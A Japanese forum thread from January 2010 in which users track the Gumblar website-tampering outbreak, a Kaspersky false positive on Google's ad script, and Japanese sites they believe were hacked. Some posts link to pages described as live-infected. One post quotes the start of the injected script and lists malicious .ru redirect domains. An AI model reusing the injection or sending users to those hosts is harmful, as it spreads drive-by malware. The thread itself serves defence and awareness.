2010/01/25(月) 15:49:240690名無しさん@お腹いっぱい。
2010/01/25(月) 15:51:400691名無しさん@お腹いっぱい。
2010/01/25(月) 15:52:200692名無しさん@お腹いっぱい。
2010/01/25(月) 15:53:42昨晩まで普通に見れたサイトばかりなんだが…
0693名無しさん@お腹いっぱい。
2010/01/25(月) 15:55:160694名無しさん@お腹いっぱい。
2010/01/25(月) 15:59:14あそこゴミじゃんwwww
0695名無しさん@お腹いっぱい。
2010/01/25(月) 15:59:29うrl
0696名無しさん@お腹いっぱい。
2010/01/25(月) 16:00:33http://tsushima.2ch.net/test/read.cgi/news/1264402100/
これか?
0697名無しさん@お腹いっぱい。
2010/01/25(月) 16:00:400698名無しさん@お腹いっぱい。
2010/01/25(月) 16:01:09↑これじゃねぇの?って噂もあるみたいだけど
(こんなんその辺のサイトに埋め込まれまくりやん)
気力のある人はスクリプトを解析してみそwオレはごめんだがw
0699名無しさん@お腹いっぱい。
2010/01/25(月) 16:01:23http://pagead2●googlesyndication●com/pagead/show_ads●js
0700名無しさん@お腹いっぱい。
2010/01/25(月) 16:01:45誤検出ぽいなこれ
0701名無しさん@お腹いっぱい。
2010/01/25(月) 16:01:570702名無しさん@お腹いっぱい。
2010/01/25(月) 16:04:02これを誤検出しているようじゃ行く先々でアラートの嵐だろうな。
0703名無しさん@お腹いっぱい。
2010/01/25(月) 16:04:34俺もそれだ。どう考えても誤検出だよなやっぱ
いちいち警告音鳴るのが凄く嫌だw
0704名無しさん@お腹いっぱい。
2010/01/25(月) 16:05:09これをトロイって検出してるな
したらば掲示板を初めそこらじゅうで検出されてうざくてたまらん
0705名無しさん@お腹いっぱい。
2010/01/25(月) 16:06:27この音怖すぎ
0706名無しさん@お腹いっぱい。
2010/01/25(月) 16:07:10大人しくZEROとか使ってれば大丈夫
0707名無しさん@お腹いっぱい。
2010/01/25(月) 16:07:11show_ads.js 1/40
http://www.virustotal.com/jp/analisis/250ea3d4d097c1ab23f4218e73cb8e3f72eed0e192fde86f4f81d3acc5812b34-1264402209
Kaspersky 7.0.0.125 2010.01.25 Trojan.JS.Redirector.ar
0708名無しさん@お腹いっぱい。
2010/01/25(月) 16:07:230709名無しさん@お腹いっぱい。
2010/01/25(月) 16:07:50冗談がお上手ね♪
0710名無しさん@お腹いっぱい。
2010/01/25(月) 16:08:20カスペよりZEROの方が優秀ってのは皆知ってます
0711名無しさん@お腹いっぱい。
2010/01/25(月) 16:09:370712名無しさん@お腹いっぱい。
2010/01/25(月) 16:12:42急上昇ワードの26位になってるw
0713名無しさん@お腹いっぱい。
2010/01/25(月) 16:17:40俺がググった時はこのスレがトップに出てきたわw
「Trojan.JS.Redirector.arって警告が出るぞ!」
「カスペがTrojan.JS.Redirector.ar検出してうるさいんだが」
「Trojan.JS.Redirector.arって何だ?」
「ググってみようぜ!」
「お、早速情報出てきた出てきた」
「…ってこれ俺達だし!!」
0714名無しさん@お腹いっぱい。
2010/01/25(月) 16:20:26こういった情報だけは異様にはやいな
0715名無しさん@お腹いっぱい。
2010/01/25(月) 16:20:310716名無しさん@お腹いっぱい。
2010/01/25(月) 16:20:380717名無しさん@お腹いっぱい。
2010/01/25(月) 16:25:24>>7 はルータ使ってない人用って明記しとけばおk。
0718名無しさん@お腹いっぱい。
2010/01/25(月) 16:32:530719名無しさん@お腹いっぱい。
2010/01/25(月) 16:33:35冗談だろwww
俺のは全く反応してないぞww
0720名無しさん@お腹いっぱい。
2010/01/25(月) 16:38:160721名無しさん@お腹いっぱい。
2010/01/25(月) 16:38:430722名無しさん@お腹いっぱい。
2010/01/25(月) 16:38:44ttp://labs-uploader.sabaitiba.com/virus/download/1264405015.txt
0723名無しさん@お腹いっぱい。
2010/01/25(月) 16:39:400724名無しさん@お腹いっぱい。
2010/01/25(月) 16:40:060725名無しさん@お腹いっぱい。
2010/01/25(月) 16:40:53カカスペの誤検知じゃないの?
ググって見るサイトのあっちこっちで、トトロイ続出なんだけど
0726名無しさん@お腹いっぱい。
2010/01/25(月) 16:42:210727名無しさん@お腹いっぱい。
2010/01/25(月) 16:43:200728名無しさん@お腹いっぱい。
2010/01/25(月) 16:43:48あちこちのサイトで検出されてるんだろ。
誤検出じゃなかったらスゲーとは思うんだが、
いちいちうるさくて困る。
0729名無しさん@お腹いっぱい。
2010/01/25(月) 16:45:33漏らすね
0730名無しさん@お腹いっぱい。
2010/01/25(月) 16:59:43/;;・ω・;;ヽ
. (;( ^^^ );)
`'ー---‐´
トトロイ
(2010〜)
0731名無しさん@お腹いっぱい。
2010/01/25(月) 17:02:14かわええw
0732名無しさん@お腹いっぱい。
2010/01/25(月) 17:02:330733名無しさん@お腹いっぱい。
2010/01/25(月) 17:03:200734名無しさん@お腹いっぱい。
2010/01/25(月) 17:04:24Remote Procedure Call とめたらOSさえ起動しなくなったり、
OS起動にめっちゃ時間がかかったり、ほとんどのアプリが動かなくなったりするよ
WindowsNTとかでは止めれたんだけど、止めて動かなくなるバカが増えたのか
いつのまにか標準UIからは止められなくなった
0735名無しさん@お腹いっぱい。
2010/01/25(月) 17:04:37ダダイヤログって書くべきだったか。
0736名無しさん@お腹いっぱい。
2010/01/25(月) 17:05:280737名無しさん@お腹いっぱい。
2010/01/25(月) 17:06:510738名無しさん@お腹いっぱい。
2010/01/25(月) 17:08:470739名無しさん@お腹いっぱい。
2010/01/25(月) 17:11:030740名無しさん@お腹いっぱい。
2010/01/25(月) 17:11:13本当にgoogle先生がやらかしたら世界中大騒ぎだわ
ふだんadblockで広告とめてるから警告さえでなかった
0741名無しさん@お腹いっぱい。
2010/01/25(月) 17:11:33ありがとうございます。
ポート番号「445」をいじったらオンラインにつながれなくなり
ばたばたしていてレスが遅れて申し訳ありません。
tp://soudan1●biglobe●ne●jp/qa3068747.html
ここからトロイ検出が出て少しびっくりしてしまいましたが、
誤検出?のようですね。
0742名無しさん@お腹いっぱい。
2010/01/25(月) 17:11:330743名無しさん@お腹いっぱい。
2010/01/25(月) 17:12:33カスペさん本気出したな
0744名無しさん@お腹いっぱい。
2010/01/25(月) 17:13:240745名無しさん@お腹いっぱい。
2010/01/25(月) 17:13:570746名無しさん@お腹いっぱい。
2010/01/25(月) 17:14:240747名無しさん@お腹いっぱい。
2010/01/25(月) 17:17:120748名無しさん@お腹いっぱい。
2010/01/25(月) 17:18:50JS redirectorにはかわらないな
0749名無しさん@お腹いっぱい。
2010/01/25(月) 17:19:07それはむしろ作ってほしいな
0750名無しさん@お腹いっぱい。
2010/01/25(月) 17:19:380751名無しさん@お腹いっぱい。
2010/01/25(月) 17:19:40最終決戦がはじまる
0752名無しさん@お腹いっぱい。
2010/01/25(月) 17:20:510753名無しさん@お腹いっぱい。
2010/01/25(月) 17:22:190754名無しさん@お腹いっぱい。
2010/01/25(月) 17:22:46うそー開いちゃったよー
0755名無しさん@お腹いっぱい。
2010/01/25(月) 17:23:35Google先生はAvast!を採用
カスペの時代は終わったね。
0756名無しさん@お腹いっぱい。
2010/01/25(月) 17:26:45\\ == \ __ _┌┐
[ [_二二_\_/./∠勹ヽ ロロロ\| |. ̄.「 ̄l\[ ̄|\
| .| - ┌‐─‐┤∠ ∠几 _ .「= | = | [ 勹..| l | .| |
| .| ‐ │匸 ̄ |フ / = 」|. |.|E= .|.=.」 | 勹.| レ、 | .| |
「 「 ‐ │×′く[,..、|フ = ∠|ノノ 匸 __コ/ [´ |__/. |__」 |
レィ ̄凵 L/\\| .| .λ |、_,,/| 凵 [_∧__/ 、__/\_/
. \_イ__∧_二二二λ二/ ¨\_,.‐‐‐^-‐′
0757名無しさん@お腹いっぱい。
2010/01/25(月) 17:28:26そっちかよw
もう>>7は次スレから不要に一票
手練は最初からわかって対処しているだろうし、下手に注釈つけても素人相手じゃどうしようもないわ
0758名無しさん@お腹いっぱい。
2010/01/25(月) 17:28:280759名無しさん@お腹いっぱい。
2010/01/25(月) 17:29:410760名無しさん@お腹いっぱい。
2010/01/25(月) 17:30:10Googleアドセンスはウイルス扱いでいいよ
0761名無しさん@お腹いっぱい。
2010/01/25(月) 17:33:200762名無しさん@お腹いっぱい。
2010/01/25(月) 17:33:44http://tsushima.2ch.net/test/read.cgi/news/1264408193/
0763名無しさん@お腹いっぱい。
2010/01/25(月) 17:34:16/;;・ω・;;ヽ
. (;( ^^^ );)
`'ー---‐´
_,,_ ∩
(^Д^)/
⊂ ノ とったどー
(つ ノ
(ノ
0764名無しさん@お腹いっぱい。
2010/01/25(月) 17:38:530765名無しさん@お腹いっぱい。
2010/01/25(月) 17:39:19急上昇ワードでも15位に上がりました
0766名無しさん@お腹いっぱい。
2010/01/25(月) 17:39:490767名無しさん@お腹いっぱい。
2010/01/25(月) 17:42:41Googlesyndication - Trojan.JS.Redirector.ar - Kaspersky Lab Forum
http://forum.kaspersky.com/index.php?s=4121c48068e6c432d51f81acd9e8a4b8&showtopic=155383
カスペルスキーの30日体験版を使用しているのですが
Trojan.JS.Redirector.arというトロイの木馬が検出されるのですが削除できなくて困っています。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1235796827
「trojan.js.redirector」はトロイの木馬?
http://blogs.yahoo.co.jp/capdaikou/7469484.html
0768名無しさん@お腹いっぱい。
2010/01/25(月) 17:46:20Kaspersky Internet Security 2010でトロイの木馬と検知される
http://www.google.com/support/forum/p/adsense/thread?tid=5e14b46552f19fcb&hl=ja
0769名無しさん@お腹いっぱい。
2010/01/25(月) 17:52:33こんなもんテストやってればすぐ気付くレベルだろ〜?
0770名無しさん@お腹いっぱい。
2010/01/25(月) 18:00:22かわゆすなぁ
0771名無しさん@お腹いっぱい。
2010/01/25(月) 18:08:440772名無しさん@お腹いっぱい。
2010/01/25(月) 18:13:10http://tsushima.2ch.net/test/read.cgi/news/1264410510/
0773名無しさん@お腹いっぱい。
2010/01/25(月) 18:27:59○ Gumblar
0774名無しさん@お腹いっぱい。
2010/01/25(月) 18:37:34カ、カカ、カスペ・・・な、なんだなぁ〜
ぼぼぼ、ぼクはおむすび欲(ry+AA略
0775名無しさん@お腹いっぱい。
2010/01/25(月) 18:54:530776名無しさん@お腹いっぱい。
2010/01/25(月) 18:57:08またGENOか!
今ウイルスが蔓延したのはそいつらのせいといってもいいのに
あいつら全然反省してないんだな
もう業務停止命令出せや
0778名無しさん@お腹いっぱい。
2010/01/25(月) 19:08:25外部ドメインじゃなきゃ安全とかよくいえるな
FTPのっとられてればなんでもできるっての
0779名無しさん@お腹いっぱい。
2010/01/25(月) 19:09:35このへんないきものは こっそりあなたのPCにいるのです。たぶん。
0780名無しさん@お腹いっぱい。
2010/01/25(月) 19:22:40なにそれこわい
0781名無しさん@お腹いっぱい。
2010/01/25(月) 19:26:37なにそれこわい
でも>>730のみたいなのが画面の中歩いてたら消さないだろうな
0782名無しさん@お腹いっぱい。
2010/01/25(月) 19:30:25www●kishida●gr●jp
/*Exception*/
関係無いけどGoLiveのゴミソース
<csscriptdict import>
<script type="text/javascript" src="file:///C:/Documents and Settings/ukkiy/Application Data/Adobe/Adobe GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js"></script>
</csscriptdict>
ukkiy逃げて〜
0783名無しさん@お腹いっぱい。
2010/01/25(月) 19:39:36さすが自民クオリティw
ttp://megalodon.jp/2010-0125-1938-38/www.kishida.gr.jp/
0784名無しさん@お腹いっぱい。
2010/01/25(月) 19:40:01メールで対処お願いしました
とりあえずはトップページだけみたいですね
0785名無しさん@お腹いっぱい。
2010/01/25(月) 19:41:18民主の支部も改竄されなかったか?
0786名無しさん@お腹いっぱい。
2010/01/25(月) 19:49:440787名無しさん@お腹いっぱい。
2010/01/25(月) 19:52:150788名無しさん@お腹いっぱい。
2010/01/25(月) 19:53:17家具が安くなるのはいいんだけど
まだ直ってないのね,そこ
0789名無しさん@お腹いっぱい。
2010/01/25(月) 20:13:34魚拓ページまでなら大丈夫
それ以上は感染対策してから池
0790名無しさん@お腹いっぱい。
2010/01/25(月) 20:14:170791名無しさん@お腹いっぱい。
2010/01/25(月) 21:00:060792名無しさん@お腹いっぱい。
2010/01/25(月) 21:47:45ギャーギャーうるせぇ
0793名無しさん@お腹いっぱい。
2010/01/25(月) 22:05:34カスペスレでやれ
【総合力で】Kaspersky Lab Part96【他社を圧倒】
http://pc11.2ch.net/test/read.cgi/sec/1261376321/
0794名無しさん@お腹いっぱい。
2010/01/25(月) 22:14:09tp://pagead2●googlesyndication●com/pagead/show_ads.js//show_adsから
Trojan.JS.Redirector.arを検出するんだが
>>698-699の通り誤検出ってことでいいのかな
0795名無しさん@お腹いっぱい。
2010/01/25(月) 22:20:5123時頃修正くるらしいし
0796名無しさん@お腹いっぱい。
2010/01/25(月) 22:38:15修正に期待。
0797名無しさん@お腹いっぱい。
2010/01/25(月) 22:42:14====以下誤検出スレ====
0798名無しさん@お腹いっぱい。
2010/01/25(月) 22:52:350799名無しさん@お腹いっぱい。
2010/01/25(月) 23:38:300800名無しさん@お腹いっぱい。
2010/01/26(火) 01:37:20特定のアドレスを指定して、そのページだけjavaが有効になるっていう設定ってできる?
たとえば、いつもはセキュリティレベル高だけど、ようつべだけはセキュリティレベル中(java有効)になるとか
毎回レベルを指定するのが面倒だ
0801名無しさん@お腹いっぱい。
2010/01/26(火) 01:44:020802名無しさん@お腹いっぱい。
2010/01/26(火) 01:44:59火狐野朗の自演か
0803名無しさん@お腹いっぱい。
2010/01/26(火) 01:46:230804名無しさん@お腹いっぱい。
2010/01/26(火) 01:47:55インターネットオプションのセキュリティで
信頼済みサイトに登録すればいける。
でも火狐やプニルの方が楽といえば楽かな。
0805名無しさん@お腹いっぱい。
2010/01/26(火) 01:50:430806名無しさん@お腹いっぱい。
2010/01/26(火) 01:51:28これってなんか設定間違ってるってこと?
0807名無しさん@お腹いっぱい。
2010/01/26(火) 01:58:31信頼済みサイトのセキュリティレベルを中にして
http://www.youtube.com/を追加したけど見れない
プニルの個別設定でようつべをjava有効にしてみたけど見れない
なぜだ……
0808名無しさん@お腹いっぱい。
2010/01/26(火) 02:07:33設定後、ブラウザ再起動した?
0809名無しさん@お腹いっぱい。
2010/01/26(火) 02:08:20さすがテンプレでnoscriptだか宣伝するだけあるな
0810名無しさん@お腹いっぱい。
2010/01/26(火) 02:12:18した。だが見れない
つべ以外の動画サイトも登録してはみたが、新しいjavaを入れろと表示されるだけ
もちろん、javaは最新版にしてあるし、セキュリティレベルを中に設定すれば問題なく見れる
0811名無しさん@お腹いっぱい。
2010/01/26(火) 02:16:53javascriptのこといってるのか
http://gumblarchecker.crz.jp/defend.html#ieallow
特定のウェブページを許可する項目を作りました
0813名無しさん@お腹いっぱい。
2010/01/26(火) 02:18:090814名無しさん@お腹いっぱい。
2010/01/26(火) 02:18:590815名無しさん@お腹いっぱい。
2010/01/26(火) 02:19:040816名無しさん@お腹いっぱい。
2010/01/26(火) 02:21:56js(ジャバスクリプト)とActiveXの実行許可した?
jsとJAVAは全くの別物で、ようつべはJAVA多分関係ないよw
0817名無しさん@お腹いっぱい。
2010/01/26(火) 02:31:22ようつべが見れました。ありがとう
しかし、相変わらず別の動画サイトは見れないorz
0818名無しさん@お腹いっぱい。
2010/01/26(火) 03:06:39こんな程度で躓いているならあなたには無理。
現在感染していなくて>>6の対策がきちんとできているならそのままでいいよ。
現状で>>6以上の対策は掛け捨て確実な保険というか、自己満足や趣味の領域だから。
0819名無しさん@お腹いっぱい。
2010/01/26(火) 03:39:06http://tsushima.2ch.net/test/read.cgi/news/1264410510/
0820名無しさん@お腹いっぱい。
2010/01/26(火) 03:39:400821名無しさん@お腹いっぱい。
2010/01/26(火) 03:42:40IE5です
0822名無しさん@お腹いっぱい。
2010/01/26(火) 03:44:250823名無しさん@お腹いっぱい。
2010/01/26(火) 03:46:04マジレスなんだが・・・
0824名無しさん@お腹いっぱい。
2010/01/26(火) 06:02:230825名無しさん@お腹いっぱい。
2010/01/26(火) 06:54:51ttp://www.chromeexperiments.com/
0826名無しさん@お腹いっぱい。
2010/01/26(火) 06:56:230827名無しさん@お腹いっぱい。
2010/01/26(火) 06:57:46ttp://www.chromeexperiments.com/
0828名無しさん@お腹いっぱい。
2010/01/26(火) 06:59:15ttp://www.chromeexperiments.com/
0829名無しさん@お腹いっぱい。
2010/01/26(火) 07:06:090830名無しさん@お腹いっぱい。
2010/01/26(火) 08:31:26ノートンがTrojan.Malscript!htmlで反応したんだけど
感染してんのかな?それとも誤検?
0831名無しさん@お腹いっぱい。
2010/01/26(火) 08:32:460832名無しさん@お腹いっぱい。
2010/01/26(火) 09:53:430833名無しさん@お腹いっぱい。
2010/01/26(火) 15:47:48virustotalに投げれば
0834名無しさん@お腹いっぱい。
2010/01/26(火) 16:16:45tp://toratomo●lovepop●jp/index/
さゆりちゃんの電気屋さん(/*Exception*/)
tp://electronics●sayurichan●com/
スニーカー通販(/*Exception*/)
momo-cafe●sunnyday●jp
トップページは403だが、該当ページにアクセス可能
/folder/sneaker
※ろりぽは事の重大さがわかってないらしい
調査に戻る..
0835名無しさん@お腹いっぱい。
2010/01/26(火) 16:34:150836名無しさん@お腹いっぱい。
2010/01/26(火) 17:32:10というよりはロリポとさくらで調べて行ってるんだろうけどさ。
つーかロリポGMOだろ?
同じGMOのアイルでは「ガンブラー点検無償実施」とかやってるのに
つーかGMO自体がWebAlertってのやってんのに
やっぱ安物サーバーはこういう時にダメなんかねぇ。
0837名無しさん@お腹いっぱい。
2010/01/26(火) 17:50:230838名無しさん@お腹いっぱい。
2010/01/26(火) 18:44:340839名無しさん@お腹いっぱい。
2010/01/26(火) 19:50:22上:ろりぽにつーほー
中:403
下:そこも403になってました。
0840名無しさん@お腹いっぱい。
2010/01/26(火) 20:33:44< ・、,,,;;,) ハ,,..,,ハ
< つ=つ /;;・ω・;;ヽ
ノ ノ三) (;( ^^^ );)
∠、 m)=m).. `'ー---‐´
ガンブラー トトロイ
(2009 〜 ) (2010 〜 )
0841名無しさん@お腹いっぱい。
2010/01/26(火) 20:40:540842名無しさん@お腹いっぱい。
2010/01/26(火) 20:42:520843名無しさん@お腹いっぱい。
2010/01/26(火) 21:01:00他人に迷惑かけておいてスクロールしなければ見えないところに告知してんなよ。
自分のことしか考えていないクソ政治家が露呈しているわ。
0844名無しさん@お腹いっぱい。
2010/01/26(火) 21:02:29ならば君が政治家になりたまえ
0845名無しさん@お腹いっぱい。
2010/01/26(火) 21:23:120846名無しさん@お腹いっぱい。
2010/01/26(火) 21:37:050847名無しさん@お腹いっぱい。
2010/01/26(火) 22:11:02ttp://soccer.hikaritv-bbm●com/
0848名無しさん@お腹いっぱい。
2010/01/26(火) 22:16:200849名無しさん@お腹いっぱい。
2010/01/26(火) 22:56:15whoisからべーすぼーるまがじんにめるしますた。
0850名無しさん@お腹いっぱい。
2010/01/26(火) 23:27:33乙です
0851名無しさん@お腹いっぱい。
2010/01/26(火) 23:38:31http://pc11.2ch.net/test/read.cgi/pcnews/1264516499/
0852名無しさん@お腹いっぱい。
2010/01/27(水) 01:18:54Gumblarも混乱するんじゃ?
0853名無しさん@お腹いっぱい。
2010/01/27(水) 01:22:16全部書き換えられるのが落ち
0854名無しさん@お腹いっぱい。
2010/01/27(水) 01:48:420855名無しさん@お腹いっぱい。
2010/01/27(水) 03:44:13ttp://www.google.com/safebrowsing/diagnostic?site=sakura.ne.jp&hl=ja
過去 90 日間に、このサイトの一部で不審な動きが 66 回報告されています。
Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 6048 ページのうち
241 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2010-01-26で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-26です。
不正なソフトウェアは (省略) を含む
135 個のドメインでホストされています。
(省略) を含む 20 個のドメインが、
このサイトの訪問者に不正なソフトウェアを
配布する媒体として機能しているようです。
ろりぽっぷ
ttp://www.google.com/safebrowsing/diagnostic?site=lolipop.jp&hl=ja
0856名無しさん@お腹いっぱい。
2010/01/27(水) 04:16:32ttp://www.kkj.or.jp/0120_info.php
お詫びは良いけどさ・・・
>【GENOウイルスチェッカー】
>ttp://geno.2ch.tc/
マスゴミがGumblarと8080を混同して報道したのが原因だろうな。
0857名無しさん@お腹いっぱい。
2010/01/27(水) 05:35:31ここもそうだよ
http://ameblo.jp/naturalhouse-shonan/entry-10438277179.html
なぜにブログで告知する…はおいといて
> ★ウィルス対策や駆除の方法
> ⇒コチラ のサイトに詳しく載っております。
> 所要時間はたったの5分です。
コチラ のサイト(どうしてそこ行く)
http://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html
0858名無しさん@お腹いっぱい。
2010/01/27(水) 05:41:07ttp://www●mag-x●com/
0859名無しさん@お腹いっぱい。
2010/01/27(水) 06:23:51改ざんされてる?
0860名無しさん@お腹いっぱい。
2010/01/27(水) 06:33:320861名無しさん@お腹いっぱい。
2010/01/27(水) 07:06:38サイトリニューアル
> 年末年始にかけて2週間のサイト閉鎖を行い、さらに、1月22日から25日まで、
> 部分的にページが見られなくなっておりましたこと、深くお詫びいたします。
> その後システムの調査をしましたところ、会員情報に関しては、漏洩の事実
> が認められなかったことを、ここにご報告させていただきます。
ウイルス感染問題はウヤムヤ
0862名無しさん@お腹いっぱい。
2010/01/27(水) 07:56:35レスありがとう
0863名無しさん@お腹いっぱい。
2010/01/27(水) 09:20:21コメントにSo-netセキュリティ通信のURLでも書いておこうかと思ったけど
>お互いに「アナログ人間万歳☆」ですね?!
これみて萎えた。
0864名無しさん@お腹いっぱい。
2010/01/27(水) 10:02:22HDDの重要な部分を破壊してしまう新手のワーム「Zimuse」が世界各地で感染を広げているという。
2010年01月27日 08時09分 更新
http://www.itmedia.co.jp/news/articles/1001/27/news022.html
Web知能テストに見せかけHDDのデータを破壊する粋なウィルスが登場
http://tsushima.2ch.net/test/read.cgi/news/1264552887/
0865856
2010/01/27(水) 14:25:59>コチラ のサイト(どうしてそこ行く)
>http://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html
このブログ自体は既出だが・・・
Java(JRE)の事が抜けてるから、環境次第では穴が空いたままになる可能性がw
http://minkara.carview.co.jp/userid/666259/blog/16527332/
何故か人気がある社長の糞ブログwww
さすがみんカラー
※みんな頭カラッポ=略して「みんカラ」
0866名無しさん@お腹いっぱい。
2010/01/27(水) 14:42:54そのブログにコメント出してたら消されてるなw
0867名無しさん@お腹いっぱい。
2010/01/27(水) 15:30:37いつもT-falのウェブサイトをご利用くださいましてありがとうございます。
現在サイト内において、ページによって表示されにくい個所がございます。
ただ今改善の作業を進めておりますが、完全な復旧まで今しばらくお待ち
いただけます様、よろしくお願い申し上げます。
株式会社 グループセブ ジャパン
http://www.t-fal.co.jp/
ここのサイトも感染したのかな?
0868名無しさん@お腹いっぱい。
2010/01/27(水) 15:58:24ワロタ
オカルトグッズが蔓延するサイトだからなぁ・・・
0869名無しさん@お腹いっぱい。
2010/01/27(水) 16:02:06/krups/js/xtplugar.js
/krups/js/xtplug.js
が404になってる。改ざんされて消したのかもね。
0870名無しさん@お腹いっぱい。
2010/01/27(水) 16:20:33DoS攻撃くらってテンポってるだけじゃね?
【調理器具】ティファールの鍋、取っ手外れやけど 同様の事故3件 [10/01/26]
http://anchorage.2ch.net/test/read.cgi/bizplus/1264514894/
0871名無しさん@お腹いっぱい。
2010/01/27(水) 16:41:200872名無しさん@お腹いっぱい。
2010/01/27(水) 16:47:470873名無しさん@お腹いっぱい。
2010/01/27(水) 16:48:59SQLインジェクション
あ、トレンドマイクロ的な意味じゃなくて
0874名無しさん@お腹いっぱい。
2010/01/27(水) 17:22:52symantecgam.seesaa.net
0875人柱になりたい人 ◆sage/xLnlI
2010/01/27(水) 17:31:35Windows98
Ubuntu 9.10
どれがいいんだろう
0876名無しさん@お腹いっぱい。
2010/01/27(水) 17:34:28Windows95
0877名無しさん@お腹いっぱい。
2010/01/27(水) 17:34:55nortonのアドオンが検出
これは改竄ですかね?(もしくは過去に改竄されていた?)
0878人柱になりたい人 ◆sage/xLnlI
2010/01/27(水) 17:37:53持ってない
よし、Windows98(アンチウイルスソフトなし)で踏んでこよう
0879名無しさん@お腹いっぱい。
2010/01/27(水) 17:40:42ざっと見た限りでは、少なくとも今は改竄は無いっぽい
キャッシュ見て来ます
0880名無しさん@お腹いっぱい。
2010/01/27(水) 17:43:04スナック菓子に針1本混入だった
0881877
2010/01/27(水) 17:44:50トップページでは出ないっす
0882879
2010/01/27(水) 17:52:30どこにひっかかってるんだろう…aguseでも反応無いけど
0883名無しさん@お腹いっぱい。
2010/01/27(水) 17:59:03今確認してみたらyahooのキャッシュでTrojan.Malscript!htmlと出ました
0884名無しさん@お腹いっぱい。
2010/01/27(水) 18:04:16ページ関係なしにyahoofs.jp(yahooのキャッシュ)自体が反応しているみたいだけど
これはnortonの駄目機能の誤爆かな
吊ってこようorz
0885名無しさん@お腹いっぱい。
2010/01/27(水) 18:05:350886名無しさん@お腹いっぱい。
2010/01/27(水) 18:05:54今度はノートンがYahoo!に喧嘩売ったのかw
0887名無しさん@お腹いっぱい。
2010/01/27(水) 18:08:180888名無しさん@お腹いっぱい。
2010/01/27(水) 18:13:30あっちのYahoo!とYahoo!Japanとでスクリプト等が異なると対応は遅くなるだろうな。
0889人柱になりたい人 ◆sage/xLnlI
2010/01/27(水) 18:16:53http://www.virustotal.com/jp/analisis/9f09358064b50fc8c84d1b41f1890874e25eb85cd7d3ee20e33df83bbcc6583d-1262914771
0890名無しさん@お腹いっぱい。
2010/01/27(水) 18:31:59それでググってもあまり意味ないぞ
0891名無しさん@お腹いっぱい。
2010/01/27(水) 18:34:26http://search.yahoo.co.jp/search?b=1&n=10&ei=UTF-8&fr=ie8sc&p=link%3Ahttp%3A%2F%2Fsymantecgam.seesaa.net%2F
確かに酷い
そしてSEOが出来てる訳でもない
0892名無しさん@お腹いっぱい。
2010/01/27(水) 18:57:05なに?よく分からないけどヤフーのトップページ見ただけでもノートン反応するって事?
俺のNIS2009は何も反応しないけど
0893名無しさん@お腹いっぱい。
2010/01/27(水) 19:10:20反応するのはyahooのキャッシュ鯖
検索したページをキャッシュ表示すると出る
0894名無しさん@お腹いっぱい。
2010/01/27(水) 19:15:27リアルタイムで感染中だお。/*Exception*/
ttp://www.aguse.jp/result1.php?url=http%3A%2F%2Fwww%2Emag%2Dx%2Ecom%2Fscoopinfo%2F
0895名無しさん@お腹いっぱい。
2010/01/27(水) 19:19:52ありがとう、何も反応しないや、おかしいな
0896名無しさん@お腹いっぱい。
2010/01/27(水) 19:26:32NIS2010は2009のマイナーバージョンアップに見えて全くの別物仕様だからね
ただ現状の最新エンジンには環境依存の不具合があってうざい事この上ない
0897名無しさん@お腹いっぱい。
2010/01/27(水) 20:23:47これだけ感染を繰り返すのは更新に使用しているパソコンからウィルス駆除してないんじゃないのか。あとサーバレンタル元に連絡して一時閉鎖とかの対応取って貰うとかしないと駆除と感染のいたちごっこが続きそう
0898名無しさん@お腹いっぱい。
2010/01/27(水) 20:49:25MSEで"Trojan:JS/Redirector.BQ"と出たがGumblar?
0899名無しさん@お腹いっぱい。
2010/01/27(水) 20:51:48/*Exception*/
0900名無しさん@お腹いっぱい。
2010/01/27(水) 21:01:49MyJVN バージョンチェッカで各ソフトは最新になってるけど大丈夫かな・・・
0901名無しさん@お腹いっぱい。
2010/01/27(水) 21:44:54www●pdmounted●com
リアルに感染中/*Exception*/
0902名無しさん@お腹いっぱい。
2010/01/27(水) 21:49:29めるした。
>>897
言いだしっぺの法貝リ
お願いします。m(_ _)m
0903名無しさん@お腹いっぱい。
2010/01/27(水) 22:18:03whoisからめるしました。
0904名無しさん@お腹いっぱい。
2010/01/27(水) 22:36:57トレンドマイクロのオンラインシュキャンの進めにあると思われます
トレンドマイクロの営利主義と感染サイトの告知が
感染PCを安全としGumblar蔓延を促進しているのではなかろうかと
PCデポでは無料診断と称してトレンドマイクロのオンラインシュキャンを行っていますが
これは、PCデポとトレンドマイクロの密接な繋がり上行われているものであり
安易にユーザに間違った安心感だけを与えているいるだけかと
PCがGumblarに感染しているか否かを真剣に診断しているとは
断じて言えるものでは無いのだとw
0905名無しさん@お腹いっぱい。
2010/01/27(水) 22:39:100906名無しさん@お腹いっぱい。
2010/01/27(水) 22:41:090907名無しさん@お腹いっぱい。
2010/01/27(水) 22:48:36パスワードすら変えてないんじゃないの。
しかし感染を告知しないで有料会員に感染者がいたらどうする気なんだろう。
気がつかずにいたら余計に被害が出るかもしれないのにいろんな意味で凄いわ。
0908名無しさん@お腹いっぱい。
2010/01/27(水) 22:58:47ソネットも見直してほしい…
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2121
>>25,>>52
/*LGPL*/がまだ残ってる。。。
ttp://www.aguse.jp/result1.php?url=http%3A%2F%2Fwww%2Easkulnet%2Ecom%2Faskularena%2Findex%2Ehtml
0909名無しさん@お腹いっぱい。
2010/01/27(水) 23:26:30あれって本当なの?
ハッカーが直接アクセスして改竄してるの?
てっきりウイルスがHP管理者のPCから勝手に
改竄してるんだと思ってたんだけど。
0910名無しさん@お腹いっぱい。
2010/01/27(水) 23:29:05いや、うちのサイトのせいで、感染していないと言い張るためにわざとなのか?
0911名無しさん@お腹いっぱい。
2010/01/27(水) 23:49:17本当
直接アクセスって意味がわかってないと思うけどFTPで直接
管理者のPCがウイルス感染してることも事実だけどそこから改ざんではないです
0912名無しさん@お腹いっぱい。
2010/01/28(木) 00:11:43うむうむ。
改竄の原因はウイルスではないのね。
0913名無しさん@お腹いっぱい。
2010/01/28(木) 03:05:57<script> try{window.onload=function(){document.write('<div id=megaid>
で、このへんに飛ばされるらしい
extrafreeweb.ru
limowebcam.ru
supernetbet.ru
topmediasite.ru
yourtopfilms.ru
0914名無しさん@お腹いっぱい。
